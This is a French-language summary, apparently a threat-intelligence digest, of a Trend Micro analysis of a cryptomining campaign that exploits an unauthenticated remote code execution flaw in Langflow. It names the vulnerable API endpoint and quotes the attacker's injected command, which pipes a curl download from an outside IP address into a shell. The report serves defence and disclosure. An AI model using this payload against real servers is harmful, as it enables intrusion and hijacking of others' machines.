CVE-2026-33017 : des cryptomineurs Monero exploitent Langflow via RCE non authentifiée
🔍 Contexte Publié le 23 juin 2026 par Trend Micro (Simon Dulude et John Zhang), cet article présente une analyse technique complète d’une campagne de cryptominage exploitant CVE-2026-33017, une vulnérabilité d’exécution de code à distance non authentifiée dans Langflow, un framework Python de construction de workflows LLM. 🎯 Vecteur d’accès initial L’exploitation cible l’endpoint POST /api/v1/build_public_tmp/{flow_id}/flow de Langflow, qui évalue du code Python sans authentification. L’attaquant injecte __import__('os').system('curl http://83.142.209.214:8080/isp.sh | sh') pour déclencher la chaîne d’infection. Le même flow_id UUID (0ee284cc-0eb1-493f-bc60-94fa8d1cfd18) est réutilisé dans toutes les tentatives. La fenêtre d’observation couvre 19 jours (27 mars – 15 avril 2026). ...